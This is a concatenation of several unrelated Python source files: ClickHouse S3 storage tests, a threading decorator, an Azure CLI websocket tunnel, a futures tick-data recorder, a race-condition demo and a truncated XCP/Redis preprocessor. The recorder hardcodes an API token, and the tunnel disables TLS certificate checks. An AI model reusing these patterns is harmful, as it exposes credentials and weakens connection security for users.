node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-05' FROM s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Wait for outdated partitions deletion.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4)
node.query("DROP TABLE s3_clone NO DELAY")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
# Data should remain in S3
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("ALTER TABLE s3_test FREEZE")
# Number S3 objects should be unchanged.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("DROP TABLE s3_test NO DELAY")
# Backup data should remain in S3.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE * 4)
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
def test_freeze_unfreeze(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup1'")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup2'")
node.query("TRUNCATE TABLE s3_test")
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
# Unfreeze single partition from backup1.
node.query("ALTER TABLE s3_test UNFREEZE PARTITION '2020-01-03' WITH NAME 'backup1'")
# Unfreeze all partitions from backup2.
node.query("ALTER TABLE s3_test UNFREEZE WITH NAME 'backup2'")
# Data should be removed from S3.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_s3_disk_apply_new_settings(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
def get_s3_requests():
node.query("SYSTEM FLUSH LOGS")
return int(node.query("SELECT value FROM system.events WHERE event='S3WriteRequestsCount'"))
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
s3_requests_to_write_partition = get_s3_requests() - s3_requests_before
# Force multi-part upload mode.
replace_config("<s3_max_single_part_upload_size>33554432</s3_max_single_part_upload_size>",
"<s3_max_single_part_upload_size>0</s3_max_single_part_upload_size>")
node.query("SYSTEM RELOAD CONFIG")
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096, -1)))
# There should be 3 times more S3 requests because multi-part upload mode uses 3 requests to upload object.
assert get_s3_requests() - s3_requests_before == s3_requests_to_write_partition * 3
def test_s3_disk_restart_during_load(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 1024 * 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 1024 * 1024, -1)))
def read():
for ii in range(0, 20):
logging.info("Executing %d query", ii)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
logging.info("Query %d executed", ii)
time.sleep(0.2)
def restart_disk():
for iii in range(0, 5):
logging.info("Restarting disk, attempt %d", iii)
node.query("SYSTEM RESTART DISK s3")
logging.info("Disk restarted, attempt %d", iii)
time.sleep(0.5)
threads = []
for i in range(0, 4):
threads.append(SafeThread(target=read))
threads.append(SafeThread(target=restart_disk))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
async.py
|
def run_async(func):
"""
CODE FROM: http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def run_async_daemon(func):
"""
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously) and as a daemon.
Returns the created Thread object.
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.daemon = True
func_hl.start()
return func_hl
return async_func
|
tunnel.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=import-error,unused-import
import sys
import ssl
import socket
import time
import traceback
import logging as logs
from contextlib import closing
from datetime import datetime
from threading import Thread
import websocket
from websocket import create_connection, WebSocket
from knack.util import CLIError
from knack.log import get_logger
logger = get_logger(__name__)
class TunnelWebSocket(WebSocket):
def recv_frame(self):
frame = super(TunnelWebSocket, self).recv_frame()
logger.info('Received frame: %s', frame)
return frame
def recv(self):
data = super(TunnelWebSocket, self).recv()
logger.info('Received websocket data: %s', data)
return data
# pylint: disable=no-member,too-many-instance-attributes,bare-except,no-self-use
class TunnelServer(object):
def __init__(self, local_addr, local_port, remote_addr, remote_user_name, remote_password):
self.local_addr = local_addr
self.local_port = local_port
if self.local_port != 0 and not self.is_port_open():
raise CLIError('Defined port is currently unavailable')
if remote_addr.startswith("https://"):
self.remote_addr = remote_addr[8:]
else:
self.remote_addr = remote_addr
self.remote_user_name = remote_user_name
self.remote_password = remote_password
self.client = None
self.ws = None
logger.info('Creating a socket on port: %s', self.local_port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.info('Setting socket options')
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.info('Binding to socket on local address and port')
self.sock.bind((self.local_addr, self.local_port))
if self.local_port == 0:
self.local_port = self.sock.getsockname()[1]
logger.info('Auto-selecting port: %s', self.local_port)
logger.info('Finished initialization')
def create_basic_auth(self):
from base64 import b64encode
basic_auth_string = '{}:{}'.format(self.remote_user_name, self.remote_password).encode()
basic_auth_string = b64encode(basic_auth_string).decode('utf-8')
return basic_auth_string
def is_port_open(self):
is_port_open = False
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
if sock.connect_ex(('', self.local_port)) == 0:
logger.info('Port %s is NOT open', self.local_port)
else:
logger.info('Port %s is open', self.local_port)
is_port_open = True
return is_port_open
def is_webapp_up(self):
import certifi
import urllib3
from azure.cli.core.util import should_disable_connection_verify
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
if should_disable_connection_verify():
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(self.remote_user_name, self.remote_password))
url = 'https://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx?GetStatus')
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
msg = r.read().decode('utf-8')
logger.info('Status response message: %s', msg)
if 'FAIL' in msg.upper():
logger.info('WARNING - Remote debugging may not be setup properly. Reponse content: %s', msg)
return False
if 'SUCCESS' in msg.upper():
return True
return False
def _listen(self):
self.sock.listen(100)
index = 0
basic_auth_string = self.create_basic_auth()
while True:
self.client, _address = self.sock.accept()
self.client.settimeout(60 * 60)
host = 'wss://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx')
basic_auth_header = 'Authorization: Basic {}'.format(basic_auth_string)
cli_logger = get_logger() # get CLI logger which has the level set through command lines
is_verbose = any(handler.level <= logs.INFO for handler in cli_logger.handlers)
if is_verbose:
logger.info('Websocket tracing enabled')
websocket.enableTrace(True)
else:
logger.info('Websocket tracing disabled, use --verbose flag to enable')
websocket.enableTrace(False)
self.ws = create_connection(host,
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),),
class_=TunnelWebSocket,
header=[basic_auth_header],
sslopt={'cert_reqs': ssl.CERT_NONE},
timeout=60 * 60,
enable_multithread=True)
logger.info('Websocket, connected status: %s', self.ws.connected)
index = index + 1
logger.info('Got debugger connection... index: %s', index)
debugger_thread = Thread(target=self._listen_to_client, args=(self.client, self.ws, index))
web_socket_thread = Thread(target=self._listen_to_web_socket, args=(self.client, self.ws, index))
debugger_thread.start()
web_socket_thread.start()
logger.info('Both debugger and websocket threads started...')
logger.info('Successfully connected to local server..')
debugger_thread.join()
web_socket_thread.join()
logger.info('Both debugger and websocket threads stopped...')
logger.info('Stopped local server..')
def _listen_to_web_socket(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for websocket data, connection status: %s, index: %s', ws_socket.connected, index)
data = ws_socket.recv()
logger.info('Received websocket data: %s, index: %s', data, index)
if data:
# Set the response to echo back the recieved data
response = data
logger.info('Sending to debugger, response: %s, index: %s', response, index)
client.sendall(response)
logger.info('Done sending to debugger, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
logger.info('Client disconnected!, index: %s', index)
client.close()
ws_socket.close()
def _listen_to_client(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for debugger data, index: %s', index)
buf = bytearray(4096)
nbytes = client.recv_into(buf, 4096)
logger.info('Received debugger data, nbytes: %s, index: %s', nbytes, index)
if nbytes > 0:
responseData = buf[0:nbytes]
logger.info('Sending to websocket, response data: %s, index: %s', responseData, index)
ws_socket.send_binary(responseData)
logger.info('Done sending to websocket, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
logger.warning("Connection Timed Out")
finally:
logger.info('Client disconnected %s', index)
client.close()
ws_socket.close()
def start_server(self):
self._listen()
def get_port(self):
return self.local_port
|
drEngine.py
|
# encoding: UTF-8
'''
本文件中实现了行情数据记录引擎,用于汇总TICK数据,并生成K线插入数据库。
使用DR_setting.json来配置需要收集的合约,以及主力合约代码。
'''
import json
import os
import copy
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue
from threading import Thread
from eventEngine import *
from vtGateway import VtSubscribeReq, VtLogData
from drBase import *
from vtFunction import todayDate
import tushare as ts
ts.set_token('ced15aa738976abf2136cc9e197fbcd34776e0f8183c7660b7fdcd626a715b3b') # paolo
import time
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
settingFileName = os.getcwd() + '/dataRecorderAlone/' + settingFileName
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
# 是否登录CTP
self.ctpConnected = False
# 数据库客户端
self.dbClient = None
# 主力合约检查
self.contractsOK = False
# 期货账号
self.userID = ''
# 当前日期
self.today = todayDate()
# 主力合约代码映射字典,key为具体的合约代码(如IF1604),value为主力合约代码(如IF0000)
self.activeSymbolDict = {}
# Tick对象字典
self.tickDict = {}
# K线对象字典
self.barDict = {}
# 负责执行数据库插入的单独线程相关
self.active = False # 工作状态
self.queue = Queue() # 队列
self.thread = Thread(target=self.run) # 线程
# # 载入设置,订阅行情
# self.loadSetting()
#----------------------------------------------------------------------
def loadSetting(self):
"""载入设置"""
with open(self.settingFileName) as f:
drSetting = json.load(f)
# 如果working设为False则不启动行情记录功能
working = drSetting['working']
if not working:
return
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
# 针对LTS和IB接口,订阅行情需要交易所代码
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
# 针对IB接口,订阅行情需要货币和产品类型
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
drTick = DrTickData() # 该tick实例可以用于缓存部分数据(目前未使用)
self.tickDict[vtSymbol] = drTick
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
bar = DrBarData()
self.barDict[vtSymbol] = bar
if 'active' in drSetting:
d = drSetting['active']
# 注意这里的vtSymbol对于IB和LTS接口,应该后缀.交易所
for activeSymbol, vtSymbol in d.items():
self.activeSymbolDict[vtSymbol] = activeSymbol
# 改为由widget中的按钮新建县成
# # 启动数据插入线程
# self.start()
# 注册事件监听
self.registerEvent()
#----------------------------------------------------------------------
def procecssTickEvent(self, event):
"""处理行情推送"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
# 过滤非交易时段tick(粗略过滤,不具体区分不同合约的不同交易时间)
# http://99qh.fx168.com/cj/industry/1604/1861578.shtml
if ('15:00:00' < tick.time < '21:00:00') or ('02:30:00' < tick.time < '09:00:00') or ('11:30:00' < tick.time < '13:00:00'):
return
# 非交易时段启动
localtime = time.strftime('%H:%M:%S',time.localtime())
if ('15:05:00' < localtime < '20:55:00') or ('02:35:00' < localtime < '08:55:00') or ('11:35:00' < localtime < '12:55:00'):
return
# 转化Tick格式
drTick = DrTickData()
d = drTick.__dict__
for key in d.keys():
if key in ['lastPrice', 'upperLimit', 'lowerLimit', 'openPrice',
'lowPrice', 'highPrice', 'preClosePrice', 'bidPrice1', 'askPrice1']:
d[key] = round(tick.__getattribute__(key), 4)
elif key == 'datetime':
drTick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
else:
d[key] = tick.__getattribute__(key)
# 更新Tick数据
if vtSymbol in self.tickDict:
self.insertData(TICK_DB_NAME, vtSymbol, drTick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, drTick)
# 发出日志
self.writeDrLog(u'记录Tick数据%s,时间:%s, last:%s, bid:%s, ask:%s'
%(drTick.vtSymbol, drTick.time, drTick.lastPrice, drTick.bidPrice1, drTick.askPrice1))
# 更新分钟线数据
if vtSymbol in self.barDict:
bar = self.barDict[vtSymbol]
# 如果第一个TICK或者新的一分钟
if not bar.datetime or bar.datetime.minute != drTick.datetime.minute:
if bar.vtSymbol:
newBar = copy.copy(bar)
self.insertData(MINUTE_DB_NAME, vtSymbol, newBar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, newBar)
self.writeDrLog(u'记录分钟线数据%s,时间:%s, O:%s, H:%s, L:%s, C:%s'
%(bar.vtSymbol, bar.time, bar.open, bar.high,
bar.low, bar.close))
bar.vtSymbol = drTick.vtSymbol
bar.symbol = drTick.symbol
bar.exchange = drTick.exchange
bar.open = drTick.lastPrice
bar.high = drTick.lastPrice
bar.low = drTick.lastPrice
bar.close = drTick.lastPrice
bar.date = drTick.date
bar.time = drTick.time
bar.datetime = drTick.datetime
bar.volume = drTick.volume
bar.openInterest = drTick.openInterest
bar.openPrice = drTick.openPrice # 今日开盘价
bar.highPrice = drTick.highPrice # 今日最高价
bar.lowPrice = drTick.lowPrice # 今日最低价
bar.preClosePrice = drTick.preClosePrice
# 否则继续累加新的K线
else:
bar.high = max(bar.high, drTick.lastPrice)
bar.low = min(bar.low, drTick.lastPrice)
bar.close = drTick.lastPrice
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TICK, self.procecssTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是CtaTickData或者CtaBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
self.mainEngine.dbInsert(dbName, collectionName, d)
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
self.writeDrLog(u'启动数据引擎成功')
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
#----------------------------------------------------------------------
def ctpConnect(self):
# 登录CTP
self.mainEngine.connect('CTP')
# 需要等待1秒,否则会登录成功之前就执行完下述判断
time.sleep(1)
self.userID = self.mainEngine.gatewayDict['CTP'].mdApi.userID
if self.mainEngine.gatewayDict['CTP'].tdConnected == True:
self.ctpConnected = True
self.writeDrLog(u'CTP登录成功。账号:"%s"' % self.userID)
else:
self.writeDrLog(u'CTP登录失败。账号:"%s"' % self.userID)
#----------------------------------------------------------------------
def startAll(self):
if self.ctpConnected is False:
self.writeDrLog(u'未登录CTP, 期货Tick 订阅失败')
return
if self.dbClient is None:
self.writeDrLog(u'未连接数据库, 期货Tick 订阅失败')
return
if self.active == False:
self.writeDrLog(u'未启动数据引擎, 期货Tick 订阅失败')
return
# 订阅合约
self.loadSetting()
self.writeDrLog(u'期货Tick 订阅成功')
#----------------------------------------------------------------------
def stopAll(self):
# 取消订阅
self.eventEngine.unregister(EVENT_TICK, self.procecssTickEvent)
# 停止数据记录引擎
self.writeDrLog(u'期货Tick 取消订阅')
#----------------------------------------------------------------------
def dbConnect(self):
# 连接数据库
self.mainEngine.dbConnect()
self.dbClient = self.mainEngine.dbClient
if self.dbClient:
self.writeDrLog(u'MongoDB连接成功')
else:
self.writeDrLog(u'MongoDB连接失败')
#----------------------------------------------------------------------
def contractsInit(self):
"""判断期货主力合约"""
# 获取上个交易日lastDate
todayDate = time.strftime('%Y-%m-%d',time.localtime())
mt = ts.Master()
Cal = mt.TradeCal(exchangeCD='XSGE',beginDate=''.join(todayDate.split('-')),endDate=''.join(todayDate.split('-')),field='')
lastDate = Cal.at[0, 'prevTradeDate']
lastDate = ''.join(lastDate.split('-'))
# 获取主力合约
st = ts.Market()
with open(self.settingFileName) as f:
drSetting = json.load(f)
self.contractsOK = True
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
if setting[1] != 'CTP':
continue
contract = filter(str.isalpha, str(setting[0]))
data = st.MktMFutd(tradeDate=lastDate,contractObject=contract,field='ticker,mainCon,turnoverVol')
# 通联持仓主力
ticker1 = data[data['mainCon'] == 1].iloc[0]['ticker']
# 昨日成交量主力
ticker2 = data.at[data['turnoverVol'].argmax(), 'ticker']
# print ticker1, ticker2
# continue
# 当成交量主力于持仓主力不一致时,输出信息
if setting[0] != ticker1 or setting[0] != ticker2:
self.contractsOK = False
self.writeDrLog(u'期货 %s: 请确认主力合约(默认使用成交量):\n %s -当前选定主力\n %s -通联持仓主力\n %s -昨日成交量主力' % (contract, setting[0], ticker1, ticker2))
print (u'期货 %s: 请确认主力合约(默认使用成交量):\n %s -当前选定主力\n %s -通联持仓主力\n %s -昨日成交量主力' % (contract, setting[0], ticker1, ticker2))
print data
if self.contractsOK == False:
self.writeDrLog(u'请检查主力合约是否正确!(非强制)')
else:
self.writeDrLog(u'合约初始化成功!')
|
ex2_nolock.py
|
import multiprocessing
# python -m timeit -s "import ex2_nolock" "ex2_nolock.run_workers()"
# 12ms
def work(value, max_count):
for n in range(max_count):
value.value += 1
def run_workers():
NBR_PROCESSES = 4
MAX_COUNT_PER_PROCESS = 1000
total_expected_count = NBR_PROCESSES * MAX_COUNT_PER_PROCESS
processes = []
value = multiprocessing.Value('i', 0)
for process_nbr in range(NBR_PROCESSES):
p = multiprocessing.Process(
target=work, args=(value, MAX_COUNT_PER_PROCESS))
p.start()
processes.append(p)
# wait for the processes to finish
for p in processes:
p.join()
# print the final value
print "Expecting to see a count of {}".format(total_expected_count)
print "We have counted to {}".format(value.value)
if __name__ == "__main__":
run_workers()
|
PreHandler.py
|
import json
import time
import threading
import os
# from Ipc import Ipc
from lib import Ipc
class PreHandler:
def __init__(self):
self.end_thread = False
self.redis = Ipc(name='XCP')
self.redis_publisher = None
self.redis_dict_raw = dict()
self.redis_dict = dict()
self.bin_path = 'XCP_command.bin'
self.command_list = list()
self.daq_pack_len_list = list()
self.daq_pack_len = list()
self.init_redis_dict()
def init_redis(self):
self.redis_publisher = threading.Thread(target=self.start_publish)
self.redis_publisher.start()
def start_publish(self):
while not self.end_thread:
self.redis.publish('xcp/obj_lane', json.dumps(self.redis_dict))
time.sleep(0.05)
def init_redis_dict(self):
"""
Initialize structure of redis dictionary for raw data and data to redis.
Returns:
"""
self.redis_dict_raw.update({'objects': list(), 'cr_objects': list(), 'lanes': {'a0': list(), 'type': list()},
'vehInfo': dict(), 'traj': dict(), 'other': dict()})
self.redis_dict.update({'objects': list(), 'lanes': list(), 'vehInfo': dict(), 'traj': dict(), 'debug': dict()})
for i in range(19): # Initialize structure of front objects in raw data list
self.redis_dict_raw['objects'].append({'dx': dict(),
'dy': dict(),
'ax': dict(),
'vx': dict(),
'yaw_angle': dict(),
'collision_prob': dict(),
'class': dict(),
'index': dict(),
'state': dict()})
for i in range(12): # Initialize structure of rear corner radar objects in raw data list
self.redis_dict_raw['cr_objects'].append({'dx': dict(),
'dy': dict(),
'vx': dict(),
'index': dict(),
'state': dict(),
'collision_prob': {'value': 0}})
for i in range(4): # Initialize structure of course in raw data list
self.redis_dict_raw['lanes']['a0'].append(dict())
for i in range(4): # Initialize structure of 3 lanes in raw data list
self.redis_dict_raw['lanes']['type'].append(dict())
self.redis_dict_raw['lanes'].update({'a1': dict(), 'a2': dict(), 'a3': dict(), 'a4': dict(), 'a5': dict(),
'start': dict(), 'end': dict()})
self.redis_dict_raw['vehInfo'].update({'VehSpd': dict(), 'axv': dict(), 'ayv': dict(), 'ACC': dict(),
'TJA': dict(), 'ALC': dict(), 'HF': dict(), 'LOC_L': dict(),
'LOC_R': dict(), 'LDW': dict(), 'Gear': dict(), 'TargetSpd': dict(),
'TurnLight_L': dict(), 'TurnLight_R': dict(), 'AD': dict(),
'LC_fail_reason': dict(), 'LC_progress': dict(), 'LC_reason': dict(),
'Hands_on_warning_level': dict(), 'AD_inactive_reason': dict(),
'HF_tor_reason': dict(), 'HF_exit_forecast': dict(), 'Auto_LC': dict(),
'AD_enter_ramp': dict(), 'Eyes_on_warning_level': dict(),
'HF_available': dict(), 'HF_quit': dict(), 'AD_quit': dict(),
'is_AD_active_reminder': dict(), 'LC_confirmation': dict(),
'AD_available': dict(), 'AD_Switch': dict(),
'AD_on_remind': dict()})
self.redis_dict_raw['traj'].update({'a5': dict(), 'a4': dict(), 'a3': dict(), 'a2': dict(), 'a1': dict(),
'a0': dict(), 'dx_end': dict(), 'ss_status': dict(),
'ss_left_start': dict(), 'ss_left_end': dict(),
'ss_right_start': dict(), 'ss_right_end': dict()})
self.redis_dict_raw['other'].update({'acc': dict(), 'dodge': dict(), 'coll_rl': dict(), 'coll_rr': dict()})
for i in range(31): # Initialize structure of objects in data to redis
self.redis_dict['objects'].append({'class': 1, # car as default
'state': 0,
'ax': 0,
'vx': 0,
'yaw_angle': 0,
'collision_prob': 0,
'acc': 0,
'dodge': 0,
'index': 0,
'dx': 0,
'dy': 0})
for i in range(4): # Initialize structure of lines in data to redis
self.redis_dict['lanes'].append({'a5': 0,
'a4': 0,
'a3': 0,
'a2': 0,
'a1': 0,
'a0': 0,
'type': 0,
'end': 0,
'start': 0})
self.redis_dict['vehInfo'].update({'VehSpd': 0, 'axv': 0, 'ayv': 0, 'ACC': 0, 'TJA': 0,
'ALC': 0, 'HF': 0, 'LOC_L': 0, 'LOC_R': 0, 'LDW': 0,
'Gear': 0, 'TargetSpd': 0, 'TurnLight_L': 0, 'TurnLight_R': 0, 'AD': 0,
'LC_fail_reason': 0, 'LC_progress': 0, 'LC_reason': 0,
'Hands_on_warning_level': 0, 'AD_inactive_reason': 0,
'HF_tor_reason': 0, 'HF_exit_forecast': 0, 'AD_available': 0,
'AD_enter_ramp': 0, 'Eyes_on_warning_level': 0, 'AD_Switch': 0,
'HF_available': 0, 'HF_quit': 0, 'is_AD_active_reminder': 0,
'AD_quit': 0, 'LC_confirmation': 0, 'Auto_LC': 0, 'AD_on_remind': 0})
self.redis_dict['traj'].update({'a5': 0, 'a4': 0, 'a3': 0, 'a2': 0, 'a1': 0, 'a0': 0, 'dx_end': 0,
'ss_status': 0, 'ss_left_start': 0, 'ss_left_end': 0,
'ss_right_start': 0, 'ss_right_end': 0})
self.redis_dict['debug'].update({'accTar': 0, 'dodgeTar': 0, 'coll_rl': 0, 'coll_rr': 0})
def get_commands(self):
result = True
if os.path.isfile(self.bin_path):
try:
with open(self.bin_path, 'rb') as fn:
data = fn.read()
init_value = data[0]
next_command = init_value + 4
self.command_list.append(list())
self.command_list[0].append(init_value)
for i in range(1, len(data)):
if i < next_command:
self.command_list[-1].append(data[i])
else:
self.command_list.append(list())
self.command_list[-1].append(data[i])
next_command += data[i] + 4
print(len(self.command_list))
except IOError as err:
print(str(err))
result = False
else:
print('bin file does not exist!')
result = False
return result
def read_json(self):
"""
Read XCP_config.json to allocate variables to dictionary we need to send to redis
Returns:
"""
result = True
sig_dict_tmp = None
try:
with open(os.path.join(os.path.dirname(self.bin_path), 'XCP_config.json')) as fn:
sig_dict_tmp = json.loads(fn.read())
except IOError:
print('Error occurred while reading XCP_config.json')
result = False
if result:
daq_tmp = dict()
for each_sig in sig_dict_tmp:
if isinstance(sig_dict_tmp[each_sig], dict):
if sig_dict_tmp[each_sig]['daq'] not in daq_tmp.keys():
daq_tmp[sig_dict_tmp[each_sig]['daq']] = dict()
if sig_dict_tmp[each_sig]['odt'] not in daq_tmp[sig_dict_tmp[each_sig]['daq']].keys():
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] = list()
if not daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']]\
.append([sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
elif sig_dict_tmp[each_sig]['address'] > \
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']][-1][0]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] \
.append([sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
else:
for i in range(len(daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']])):
if sig_dict_tmp[each_sig]['address'] < \
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']][i][0]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] \
.insert(i, [sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
break
byte_ptr = 0
for i in range(len(daq_tmp.keys())):
for j in range(len(daq_tmp[i].keys())):
for each_item in daq_tmp[i][j]:
name_tmp = each_item[1]
if '_m_IDdxForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDdyForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDIndexList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDTypeForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['class']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDaxList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['ax']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDvxList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDyawAngleList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['yaw_angle']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDCollisionProbList' in name_tmp:
